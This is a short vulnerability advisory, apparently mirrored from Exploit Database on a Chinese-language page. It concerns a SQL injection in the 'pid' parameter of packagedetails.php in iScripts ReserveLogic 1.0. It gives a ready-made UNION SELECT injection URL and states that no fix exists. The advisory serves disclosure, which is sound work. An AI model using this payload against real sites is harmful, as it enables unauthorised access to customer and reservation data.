iScripts ReserveLogic 1.0 – SQL Injection

• Exploit Database
• 7 阅读

• 作者： Salvatore Fresta
  日期： 2010-07-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14163/

• iScripts ReserveLogic 1.0 SQL Injection Vulnerability
  
   NameiScripts ReserveLogic
   Vendorhttp://www.iscripts.com
   Versions Affected 1.0
  
   AuthorSalvatore Fresta aka Drosophila
   Website http://www.salvatorefresta.net
   Contact salvatorefresta [at] gmail [dot] com
   Date2010-01-07
  
  X. INDEX
  
   I.ABOUT THE APPLICATION
   II. DESCRIPTION
   III.ANALYSIS
   IV. SAMPLE CODE
   V.FIX
   
  
  I. ABOUT THE APPLICATION
  
  iScriptsReserveLogicallowsindependenthotel/motels,
  B&B,time-shares,campgrounds,tour companies, etc., to
  taketheirbusiness truly online with online reservation
  and customer management.
  
  
  II. DESCRIPTION
  
  Anumericfieldisnot properly sanitised before being
  used in a SQL query.
  
  
  III. ANALYSIS
  
  Summary:
  
   A) SQL Injection
   
  
  A) SQL Injection
  
  Thepidparameter in packagedetails.php isnot properly
  sanitisedbeforebeingusedin a SQL query. Successful
  exploitationrequiresthatthepid value exists in the
  database, or rather that is a real package id.
  
  
  IV. SAMPLE CODE
  
  A) SQL Injection
  
  http://site/path/packagedetails.php?pid=1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12%23
  
  
  V. FIX
  
  No Fix.